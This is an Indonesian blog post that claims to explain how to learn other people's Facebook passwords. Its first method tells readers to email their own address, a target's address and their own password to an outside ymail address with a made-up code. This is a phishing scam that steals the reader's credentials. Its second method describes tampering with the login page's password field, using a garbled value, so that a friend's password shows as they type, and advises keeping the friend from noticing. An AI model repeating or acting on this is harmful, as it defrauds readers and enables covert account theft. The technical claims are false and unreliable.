Membantu Cara Mengetahui Password Facebook Orang Lain dan Password Teman Anda Yang Lupa

Cara Mengetahui Password Facebook Orang Lain - Bisakah kita secara pribadi menjadi tahu cara mengetahui password Facebook orang lain? Jawabannya adalah bisa. Dengan teknologi yang sudah canggih seperti saat ini, internet yang selalu mempermudah kehidupan manusia, apapun hampir bisa dicari caranya. Hanya kembali lagi kepada niatan awal kita, untuk apa mengetahui password orang lain? Selama itu tidak disalahgunakan atau justru bermanfaat itu tidak masalah. Bahkan mungkin saja ada teman yang lupa password dan kita sengaja membantunya karena kita sudah tahu cara mengetahui password orang lain, justru ilmu tersebut bermanfaat.

Cara Mengetahui Password Facebook Orang Lain, Cara Mengetahui Password Fb Orang Lain,

Baca juga : Inilah Cara Mengetahui Siapa Yang Melihat Facebook Kita Secara Mudah


Kembali pada topik awal mengenai bagaimana caranya kita bisa tahu password orang lain. Ada dua hal yang akan kita bahas, yaitu cara yang langsung dan tidak langsung.

1. Cara langsung

Bukalah akun e-mail Anda (khususnya bagi Anda yang menggunakan Yahoo atau Gmail), untuk selain itu tidak bisa. Masuklah pada kotak mengirim pesan, tuliskan alamat tujuan yaitu reply.auto@ymail.com. Biarkan kolom bc dan cc tetap kosong. Pada subjek, isi dengan kata PASSWORD RETRIEVE. Setelah itu Anda menuliskan isi pesan, sebagai berikut: pada baris pertama dituliskan alamat e-mail Anda yang sedang Anda gunakan, pada baris kedua dituliskan alamat e-mail orang lain yang akan Anda kepo passwordnya, pada baris ketiga adalah password e-mail Anda tersebut, pada baris keempat yang merupakan baris terakhir tuliskan sebuah kode yaitu cgi-bin/$et76431&pwr999. Tunggu balasan e-mail yang berisi password yang akan cari-cari.

2. Cara tidak langsung

Kali ini menggunakan cara mengetahui password Facebook orang lain secara tidak langsung. Pada laptop atau komputer Anda, bukalah halaman awal Facebook, yaitu Facebook.com. Pada kolom password atau kata sandi, kemudian di klik kanan. Klik “periksa elemen” atau bahasa inggrisnya “inspect elemen.” Klik dua kali pada tulisan password, dan gantilah kata password tersebut dengan cronosal.js, tutup form tersebut. Mintalah teman ada untuk login akun Facebook nya menggunakan laptop atau komputer Anda yang sudah Anda atur-atur sedemikian rupa tersebut. Maka ketika teman menuliskan sandi akan terlihat oleh Anda.
Itulah dua cara untuk tahu password orang lain. Cara yang pertama dinamakan cara langsung karena Anda tidak memerlukan bantuan orang lain untuk tahu, Anda hanya mengirimkan e-mail pertanyaan kemudian Anda akan menerima balasan tentang password yang Anda inginkan. Jika dalam tiga hari belum dibalas, tunggu sampai sekitar satu minggu. Hal ini berbeda dengan cara kedua, atau cara tidak langsung, karena Anda membutuhkan teman Anda sendiri yang notabene dia yang akan Anda kepo passwordnya. Berarti di sini secara tidak langsung Anda meminta bantuan teman Anda menuliskan passwordnya.
 
Cara mengetahui password Facebook orang lain yang kedua ini memang memerlukan syarat bahwa orang lain tersebut haruslah teman Anda, karena Anda membutuhkan dia untuk login di laptop Anda. Berarti Anda mengenal orang tersebut. Jangan sampai teman Anda melihat layar ketika ia menuliskan password, karena biasanya pada kolom password hanya muncul tanda bintang yang artinya dirahasiakan. Jangan sampai teman Anda curiga karena tidak muncul tanda bintang.
 
Internet Blogs
blog links Top academics blogs internet blogs blogs
internet blogs blogs